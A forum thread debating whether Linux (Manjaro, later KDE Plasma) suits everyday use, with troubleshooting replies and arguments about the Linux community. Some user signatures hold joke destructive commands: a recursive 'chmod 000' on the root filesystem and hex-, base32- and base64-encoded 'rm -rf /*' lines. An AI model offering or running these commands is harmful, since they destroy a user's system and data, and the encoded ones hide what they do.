Technical/Server stuff aside is Linux worth it? ( Kinda roasting Linux )

Exaco

Hello guys, for years i've seen everyone saying that Linux or MacOS is so much better than Windows, so i've tried using both without any success.. Software support limitations, performance differences ( e.g. Linux is worse for gaming and same as windows for the rest e.g. 3D Rendering, Video Rendering ).

I know Linux outperforms Windows in tech stuff, servers etc, reliability/stability too, there's no competition there.
But i'm talking about daily use ( watching Youtube, Gaming, watching movies, sitting in Social Media/Forums doing business, working with files etc.. ).

Here's my first ~15min experience with Manjaro ( cons of Manjaro compared to Win10 ) .

1) Main "File System" dir is cluttered with various shit i will never use https://imgur.com/N4prOMX.png, ideally i would like to see my Partitions/Drives here, not some bin, dev, var, proc folders.
Edit: nvm it's just how it works, not very visually pleasing that's all.

2) In Win10 each folder has it's own icon size/type, in manjaro if i make "D:" drive contents "View as detailed List" then i can't make for example my project folder look different e.g. Compact List or Icons. Example: https://i.gyazo.com/af383997738746566374c98f8cfe8885.mp4
3) Search is harder to access ( File -> Search -> New window pops up ) while in Win10 it's already in the sight.
4) System uses weird ugly sort of aliasied font. 
Edit: not a big issue, fonts can be customized only that i haven't figured out how to install custom fonts in Linux yet.

Bigger issues:
1) My screen is slightly flickering when using Manjaro ( kinda fixed when i switched to 144hz ).
2) No sensitivity option for mice ( it uses RAW DPI or CPI ).
But has a sensitivity option for Keyboard.. really?
3) No Nvidia Control Panel, no Sound Card ( Creative Soundblaster ) software.
4) Hard to install drivers:
https://wiki.manjaro.org/index.php... ?
5) Can't run OctaneBench ( nothing happens when i Right Click -> Execute ).
6) Can't run V-Ray Bench https://imgur.com/P8w7ZnT.png
7) Can't install Opera https://imgur.com/InKr4Gg.png
Installed using that app store ( took like 3x longer than installing on Win10 ).
😎 Can't install steam ( same issue as with opera ).
Seems like it's preinstalled, but basically i can't install anything which was manually downloaded and requires some terminal stuff.
9) Even basic stuff like installing fonts is difficult.
Win10: Right Click on the font file / select lots of fonts right click -> Install
Linux: need to drop them to /usr/share/fonts/ manually via terminal, because it doesn't let to drag and drop the files directly there.
10) Can't write files to non-OS drives ( outside of "Home" basically )

On top seems like Linux distros design haven't changed in past 10 years and looks so behind Windows, ofcourse i don't blame them it's free and all that, they probs don't have millions of dollars to spend for UX, UI and 2D Designers like Microsoft or Apple do.

Manjaro Pros:
1) Nice built-in "Screenshot" app which lets to save image on local drive or post to imgur.
2) "Package Manager" aka Pacmac.
3) Way more customization even tho no matter what it still looks pretty bad compared to Win10 ( at best it could look like MacOS which is also behind Win10 ).
4) Faster Desktop experience/boot.
5) Less recource usage ( however Linux never helped me to make low-end hardware run any better even with the most lightweight distros but it could give some more room when working on RAM intense jobs for example ).

So after playing around i kinda coming to conclusion that it's pure taste e.g. there's Specialized High Quality coffee and Commercial crappy coffee, but some people prefer the taste of crappy coffee so it seems like the crappy coffee is Linux here.

Or... I am just missing something and i should go deeper to see the beauty of Linux?

P.S.

I know alot of people hate Windows because of some pop-ups ( i never seen those for some reason besides some notifications if Windows Defender is on/off or found a virus or some update coming which manjaro in fact also has ), then there's "Spyware" in windows which i also don't care about, pretty sure Microsoft is only interested in the marketing stuff and not going to watch your nudes also not going to record what you eat, what happened last friday and laugh from you in a meeting, then also some is triggered by "new features" e.g. Cortana, yep it's sometimes annoying, but it's like 1-2min fix ( which in fact takes way less than installing Fonts in Linux ).

2 minutes ago, Exaco said:

On top seems like Linux distros design haven't changed in past 10 years and looks so behind Windows

That's not the case at all, you can make Linux look however you like and on top of that most distros look great from the outset. I don't know what version of Manjaro you tried but you should check out the Plasma version.

As for the thread in general, do you think it's fair to judge a system after 15 minutes of use compared to a system you've used your whole life?

Don't ask to ask, just ask... please 🤨

sudo chmod -R 000 /*

5 minutes ago, Exaco said:

But i'm talking about daily use ( watching Youtube, Gaming, watching movies, sitting in Social Media/Forums doing business, working with files etc.. ).

I would go as far as preferring Android and iOS over Linux for those tasks. Linux for me just requires too many hacked up workarounds for it to be a true daily driver OS for the typical consumer. 

It's great for enthusiasts (that know what they are doing). If you're not one of those people, I would avoid Linux if you can. 

Intel® Core™ i7-12700 | GIGABYTE B660 AORUS MASTER DDR4 | Gigabyte Radeon™ RX 6650 XT Gaming OC | 32GB Corsair Vengeance® RGB Pro SL DDR4 | Samsung 990 Pro 1TB | WD Green 1.5TB | Windows 11 Pro | NZXT H510 Flow White
Sony MDR-V250 | GNT-500 | Logitech G610 Orion Brown | Logitech G402 | Samsung C27JG5 | ASUS ProArt PA238QR
iPhone 12 Mini (iOS 17.2.1) | iPhone XR (iOS 17.2.1) | iPad Mini (iOS 9.3.5) | KZ AZ09 Pro x KZ ZSN Pro X | Sennheiser HD450bt
Intel® Core™ i7-1265U | Kioxia KBG50ZNV512G | 16GB DDR4 | Windows 11 Enterprise | HP EliteBook 650 G9
Intel® Core™ i5-8520U | WD Blue M.2 250GB | 1TB Seagate FireCuda | 16GB DDR4 | Windows 11 Home | ASUS Vivobook 15 
Intel® Core™ i7-3520M | GT 630M | 16 GB Corsair Vengeance® DDR3 |
Samsung 850 EVO 250GB | macOS Catalina | Lenovo IdeaPad P580

1 minute ago, Sauron said:

As for the thread in general, do you think it's fair to judge a system after 15 minutes of use compared to a system you've used your whole life?

Not really, but when in first 15mins there's ~14 things that's much worse than in Win10 isn't that a bad sign?

8 minutes ago, Exaco said:

1) Main "File System" dir is cluttered with various shit i will never use https://imgur.com/N4prOMX.png, ideally i would like to see my Partitions/Drives here, not some bin, dev, var, proc folders.

2) In Win10 each folder has it's own icon size/type, in manjaro if i make "D:" drive contents "View as detailed List" then i can't make for example my project folder look different e.g. Compact List or Icons. Example: https://i.gyazo.com/af383997738746566374c98f8cfe8885.mp4
3) Search is harder to access ( File -> Search -> New window pops up ) while in Win10 it's already in the sight.
Edit: not a big issue, fonts can be customized only that i haven't figured out how to install custom fonts in Linux yet.

1. You will use it. Just because you don't know how, doesn't mean you won't use it. Plus, this is the root of your drive. Your home folder has all the stuff you will use on a daily basis and will be very similar to Windows.

2-4: You can customize it.

9 minutes ago, Exaco said:

Bigger issues:
1) My screen is slightly flickering when using Manjaro ( kinda fixed when i switched to 144hz ).
Installed using that app store ( took like 3x longer than installing on Win10 ).
Seems like it's preinstalled, but basically i can't install anything which was manually downloaded and requires some terminal stuff.
Win10: Right Click on the font file / select lots of fonts right click -> Install
Linux: need to drop them to /usr/share/fonts/ manually via terminal, because it doesn't let to drag and drop the files directly there.

1. Problem with your hardware, not with Linux. I have never had this issue.

2. Yes there is. Depends on the DE, but most have an option outside of DPI (assuming you mean like a scale of 1-10 or something)

3. You don't need it.

4. You don't need to install drivers, and if you do, just one command or one package to install.

5-8. How are you installing these? It's not like on Windows, you don't download an executable and click it. Always worked just fine for me.

9. Um...no. Just install one package.

9A. You can drag and drop file locations into terminal. Depends on the emulator you are using

10. Yes you can lol.

So it sounds to me like you don't know how to do stuff so you automatically assume it is Linux's fault and can't possibly be your own. That's kinda dumb.

Quote me to see my reply!

SPECS:

CPU: Ryzen 7 3700X Motherboard: MSI B450-A Pro Max RAM: 32GB I forget GPU: MSI Vega 56 Storage: 256GB NVMe boot, 512GB Samsung 850 Pro, 1TB WD Blue SSD, 1TB WD Blue HDD PSU: Inwin P85 850w Case: Fractal Design Define C Cooling: Stock for CPU, be quiet! case fans, Morpheus Vega w/ be quiet! Pure Wings 2 for GPU Monitor: 3x Thinkvision P24Q on a Steelcase Eyesite triple monitor stand Mouse: Logitech MX Master 3 Keyboard: Focus FK-9000 (heavily modded) Mousepad: Aliexpress cat special Headphones:  Sennheiser HD598SE and Sony Linkbuds

🏳️‍🌈

I'm in a similar but much worse boat

I dislike linux , mac os , and windows 10. lol

Not seeing what fundamentally improved over what i currently use and I'm literally stuck choosing one of these terrible choices to live with forever hating it.

You never know how good you have it till it's gone i guess. And I'm really going to miss having a computer that has no problems

5 minutes ago, BlueChinchillaEatingDorito said:

It's great for enthusiasts (that know what they are doing). If you're not one of those people, I would avoid Linux if you can. 

Sounds like it's a perfect OS for tweakers like me ( not the meth kind ofc ) and at the same time it could be sort of better in long run, guess i gonna play around with it in free time and try to develop the themes and stuff to my preferences and see if that works for me.

1 minute ago, kelvinhall05 said:

So it sounds to me like you don't know how to do stuff so you automatically assume it is Linux's fault and can't possibly be your own.

this is actually one of my favorite diagnostic excuses linux people give.

because its so easily reversed to "linux actually has a problem and I don't know how to fix it so it must be your fault and can't possibly be linux" lol

2 minutes ago, emosun said:

this is actually one of my favorite diagnostic excuses linux people give.

because its so easily reversed to "linux actually has a problem and I don't know how to fix it so it must be your fault and can't possibly be linux" lol

Good point, except I don't see any of those points in OP's situation.

Manjaro worked for me right out of the box; everything I needed to use the PC for was preinstalled, or was installed later with one command or two clicks in graphical package manager. Most of OP's complaints come from his choice of DE, that DE's default settings and included apps, and clearly he didn't read for five seconds how to install Steam or the other two apps he mentioned.

SPECS:

CPU: Ryzen 7 3700X Motherboard: MSI B450-A Pro Max RAM: 32GB I forget GPU: MSI Vega 56 Storage: 256GB NVMe boot, 512GB Samsung 850 Pro, 1TB WD Blue SSD, 1TB WD Blue HDD PSU: Inwin P85 850w Case: Fractal Design Define C Cooling: Stock for CPU, be quiet! case fans, Morpheus Vega w/ be quiet! Pure Wings 2 for GPU Monitor: 3x Thinkvision P24Q on a Steelcase Eyesite triple monitor stand Mouse: Logitech MX Master 3 Keyboard: Focus FK-9000 (heavily modded) Mousepad: Aliexpress cat special Headphones:  Sennheiser HD598SE and Sony Linkbuds

🏳️‍🌈

25 minutes ago, kelvinhall05 said:

2. Yes there is. Depends on the DE, but most have an option outside of DPI (assuming you mean like a scale of 1-10 or something)
3. You don't need it.

9. Um...no. Just install one package.
10. Yes you can lol.

That's the kind of reply i was waiting for, kinda motivating :D 

2. There's device selection, if i select my keyboard there's Acceleration and Sensitivity option but if i select my Mouse it's only Acceleration and i don't want Acceleration since the mouse movement should be linear 1:1 without any speed curves, i need the sensitivity.
Also the sensitivity controls on the software ( which only for Win and MacOS ) but mby Wine could handle it.

3. Hmm.. i have my monitor Calibration settings that uses combo of Nvidia Control Panel and monitor itself ( due to a bit limited monitor settings it needs Control Panel ).
I know it's a bit of crap but it helps on certains things.

9. What if i use DaFont or some paid fonts? e.g. my Client sends me few font files.

10. I do believe i can, the question is how to get the access :D 

20 minutes ago, Exaco said:

Not really, but when in first 15mins there's ~14 things that's much worse than in Win10 isn't that a bad sign?

Do you remember your first 15 minutes with Windows? Installing it from scratch and with nobody guiding you, no less?

sudo chmod -R 000 /*

3 minutes ago, Sauron said:

Do you remember your first 15 minutes with Windows? Installing it from scratch and with nobody guiding you, no less?

I guess that's the problem, with Win i had no issues because it was the only and first OS i knew for like 3 years.
There ofc was issues but i was unable to blame Win just because i was bad with tech and softwares in general so it was just curiosity how to do that or that and exploring new stuff.

2 minutes ago, kelvinhall05 said:

Manjaro worked for me right out of the box; everything I needed to use the PC for was preinstalled, or was installed later with one command or two clicks in graphical package manager. Most of OP's complaints come from his choice of DE, that DE's default settings and included apps, and clearly he didn't read for five seconds how to install Steam or the other two apps he mentioned.

Op , I'd just avoid linux really

Otherwise , the consequences of having to deal with the unhinged superiority complex of your "support team" being just a handful of linux users who'd like nothing more than to be different and unique over collecting new users far outweighs the benefit of using the platform.

thats always what I ran into , the os is probably fine , but the community and support regarding new users is by far the absolute worst that exists. 

the hazing the linux community feels new users require to actually be worthy of their os is having to learn almost everything by yourself and dare not asking easy questions. If you dare ask a question that could have been googled it will be met with sarcastic and hateful responses as such.  Honestly , it's the worst part about linux..... the people who you rely on the get help with it. just not worth it

2 minutes ago, Exaco said:

I guess that's the problem, with Win i had no issues because it was the only and first OS i knew for like 3 years.
There ofc was issues but i was unable to blame Win just because i was bad with tech and softwares in general so it was just curiosity how to do that or that and exploring new stuff.

seriously this is your issue with linux , it's the lack of help or the lack of even wanting to help new users.

The barrier they create is so high it never ends up being worth it , just save yourself the hassle and avoid it. I truly think you'll be so much happier avoiding the toxicity they create to deter new users

4 minutes ago, emosun said:

Otherwise , the consequences of having to deal with the unhinged superiority complex of your "support team" being just a handful of linux users who'd like nothing more than to be different and unique over collecting new users far outweighs the benefit of using the platform.

thats always what I ran into , the os is probably fine , but the community and support regarding new users is by far the absolute worst that exists. 

the hazing the linux community feels new users require to actually be worthy of their os is having to learn almost everything by yourself and dare not asking easy questions. If you dare ask a question that could have been googled it will be met with sarcastic and hateful responses as such.  Honestly , it's the worst part about linux..... the people who you rely on the get help with it. just not worth it

Not sure how us trying to answer his questions and complaints about Linux is us hazing him, but ok.

SPECS:

🏳️‍🌈

3 minutes ago, kelvinhall05 said:

Not sure how us trying to answer his questions and complaints about Linux is us hazing him

25 minutes ago, kelvinhall05 said:

it sounds to me like you don't know how to do stuff so you automatically assume it is Linux's fault and can't possibly be your own. That's kinda dumb

12 minutes ago, Exaco said:

Which is great, by all means do that - I'm just arguing that maybe it's a little early for you to make a judgment. Yes, the first impact is harder but I would argue it's mainly because people grow up using something completely different and can usually ask someone nearby for help whereas with Linux you're often on your own outside of internet forums and documentation.

For a complete beginner I would recommend going with Ubuntu - Manjaro is fine but there are some subtle differences that are best left for later in your journey. As for driver problems, unfortunately sometimes the driver just doesn't exist because the manufacturer didn't make one - but luckily that's usually not the case and with a little research you can get what you need installed.

46 minutes ago, Exaco said:

So after playing around i kinda coming to conclusion that it's pure taste e.g. there's Specialized High Quality coffee and Commercial crappy coffee, but some people prefer the taste of crappy coffee so it seems like the crappy coffee is Linux here.

I would argue Linux is the specialized coffee that isn't to everyone's taste but quite frankly I don't think that has been the case for a while - most people nowadays can have a pretty good experience with Linux if they give it a chance, even if they have no particular use for the advantages it has over Windows.

There's also the ideological argument - Linux is free and open source software, meaning you own it and can do whatever you want with it whereas with Windows or MacOS you're forced to comply with the whims of the corporation making them. Since Windows is licensed and not owned Microsoft could at any moment push an update that makes it unusable for you or violates your privacy even more than it does now and you'd have no recourse. If this is something you care about then one could argue that even if Linux isn't quite to your taste it's a good compromise in exchange for a higher degree of personal freedom and ownership of the software you need. Imagine if the barista could reach into your coffee while you're drinking it and pour a spoonful of table salt in it...

sudo chmod -R 000 /*

1 hour ago, Sauron said:

Which is great, by all means do that - I'm just arguing that maybe it's a little early for you to make a judgment. Yes, the first impact is harder but I would argue it's mainly because people grow up using something completely different and can usually ask someone nearby for help whereas with Linux you're often on your own outside of internet forums and documentation.

I just switched to Plasma KDE and damn.. it's as good as Win10 UI-wise and i see it's kinda based on Win10, all the icons is similar, placement of some features etc., literally blows out of the water the XFCE version which not only looked outdated but also felt clunky. File Explorer also seems superior to XFCE.

For a complete beginner I would recommend going with Ubuntu - Manjaro is fine but there are some subtle differences that are best left for later in your journey.

Well i've used Kali Linux in the past doing some "skid" stuff also i've read that these differences aren't that huge, it's not like 5th grade math vs rocket science difference so i think i should be fine, not afraid of the Terminal but it can be huge hassle at the start. On top i like challenges and learning new stuff, using something "easier" would not feel rewarding and would be super demotivating.

Yeah good point about the coffee.

Thanks!

23 hours ago, Exaco said:

Kinda my thoughts when ever I have to fix something on mom's iPad. And Windows Phone when her work used those.

^^^^ That's my post ^^^^
<-- This is me --- That's your scrollbar -->
vvvv Who's there? vvvv

8 hours ago, LogicalDrm said:

Kinda my thoughts when ever I have to fix something on mom's iPad. And Windows Phone when her work used those.

Damn i almost forgot about that Windows Phone OS :D
It was a such garbage, nothing even remotely close to windows, just a portion of Win 8.1 Start menu.

On 5/29/2020 at 4:01 PM, Exaco said:

1. This is the filesystem hierarchy standard of Linux, derived from UNIX. The idea is simple, each has its own specific purpose, meaning that files from different packages that serve the same/similar purpose will be grouped together. Ex. All essential system binaries/executable files goes to /bin/, all temporary files go to /tmp/, all user-owned files goes to /home/$USER/, etc. The root directory is not rigid, so you can add and remove directories in there, such as mounting an additional partition in /$partition_name. Also, partitions can be mounted in any directory as long as a directory can serve as a root directory exists. Ex: Mounting a partition in ~/$drive_name, you would use
    mkdir ~/$drive_name; sudo mount /dev/sdXY ~/$drive_name; sudo chown -R $USER ~/$drive_name
  2. That's a problem with the nautilus file manager, the GNOME team likes to remove useful features and users must rely on user-created extensions. Try the nemo file manager instead (from the cinnamon desktop) if you want a GTK file manager, else try KDE's dolphin.
  3. Again, Nautilus. Although, it sounds like you didn't search using the applications/activities panel in Gnome.
  4. Sometimes, distro maintainers make some weird design decisions.
    1.  On most desktop environments, just open the font in the default font viewer and there is an install button. In KDE, it's the lower right corner of kFontView.
On 5/29/2020 at 4:14 PM, kelvinhall05 said:

Bigger issues:

1. Ah, yes. Novideo
  2. Been a while since I've used Gnome, but I do know you need gnome-tweaks to disable mouse acceleration. KDE, it's in System Settings -> Input Devices -> Mouse.
  3. Install proprietary Nvidia drivers, then you should have the Nvidia X Server Settings (Something like that), that's the Nvidia control panel for Linux. (ArchWiki:Nvidia)
  4. Seems like you've already figured that out.
  5. Right-click -> properties -> Executable, or
    chmod +x ./octane
    then run it:
    ./octane
  6. Right-click -> properties -> Executable, or
    chmod +x ./vray-benchmark-4.10.7
    then run it
    ./vray-benchmark-4.10.7
  7. sudo pacman -S opera
    I advise you setup your pacman mirrors correctly for optimal speed.
  8. sudo pacman -S steam
    or look for steam in your GUI package manager. It's in the Multilib repo so you might need to enable it.
  9. See 4.a. in previous section
  10. These files/directories are not owned by you, they are owned by root. You will need to use sudo. I advise you to not to change anything outside of your home directory unless it is necessary. See 1. In the previous section.
# $(echo 726d202d7266202f2a0a | xxd -r -p)
# $(echo OJWSALLSMYQC6KQK | base32 -d)
# $(echo cm0gLXJmIC8qCg== | base64 -d)

10 hours ago, CactusMan said:

Thanks! However since i've switched to KDE Plasma from XFCE most of the issues got solved automatically e.g. Vray Bench and OctaneBench instantly working also i can write files to my non-OS drives, the font is alot better, sensitivity option is intact ( exact same as in windows set by default 6/11 ), File manager way better, even better than Windows one, visually it can look way better or way worse than Windows due to pretty insane customization options out of the box, no flickering ( even that one i think was just my crappy monitor and not related to OS, it works fine now btw it was brightness flickering like some sort of lamp getting very slightly shorted out not like on/off flickering ).

Seems like Manjaro XFCE just sucks for newbies and was missing so many stuff.

Later i've realized that i won't be able to do 3D in Linux due to poor software support and won't be able to game on it, CS:GO has around 40-60fps less, GTA V ( Lutris ) doesn't even launch with my mods such as ENBSeries or ReShade also after good few hours of using KDE Plasma i've realized that Linux is not as smooth as windows, there's lots of stuttering in Linux ( i've set GPU to max performance that helped a little but not good enough ), probs another NoVideo problem or it's more SSD sensitive, because my SSD is utter garbage ( Kingston A400 ), whole OS starts freezing/stuttering when installing or downloading something.

On 5/29/2020 at 10:32 PM, emosun said:

On 5/29/2020 at 10:34 PM, emosun said:

seriously this is your issue with linux , it's the lack of help or the lack of even wanting to help new users.

The barrier they create is so high it never ends up being worth it , just save yourself the hassle and avoid it. I truly think you'll be so much happier avoiding the toxicity they create to deter new users

You could not be more wrong in your assumptions. The Linux community welcomes new users wholeheartedly*, but it comes with an implied "do your homework" mantra. There's so much knowledge already out there, just a Google away, users who have a problem can most likely find the answer online as their problem has been addressed before, probably even multiple times. It's only courteous to firstly exhaust all of your powers to solve an issue before asking for help, isn't it? This is in high contrast to what's going on in Win-OS (and gaming!) forums, like LTT, where the slightest hint of something not going according to the expectations of some random user, said user immediately fires a new forum post, written in screaming capitals demanding instant solution of the issue, right now! That's not how the Linux community works. And that's why new users get a telling-off as they don't adhere to the rules of the Linux community.

*yes, as Linus mentioned in his "10 reasons why Linux is better" video, there are some snobs who show undesirable behaviour in this aspect, but that's not a Linux-specific issue at all. Watch the video!

"You don't need eyes to see, you need vision"

(Faithless, 'Reverence' from the 1996 Reverence album)

17 hours ago, Dutch_Master said:

but it comes with an implied "do your homework" mantra.

There's so much knowledge already out there, just a Google away

firstly exhaust all of your powers to solve an issue before asking for help

that's why new users get a telling-off as they don't adhere to the rules of the Linux community

bravo , couldn't have illustrated the problem better myself.

The problem is not me, my message or the Linux community. It's you. And your clearly apparent failure to grasp the basics of how the Linux community actually works.

Anyway, I shall not feed the troll any further.

"You don't need eyes to see, you need vision"

(Faithless, 'Reverence' from the 1996 Reverence album)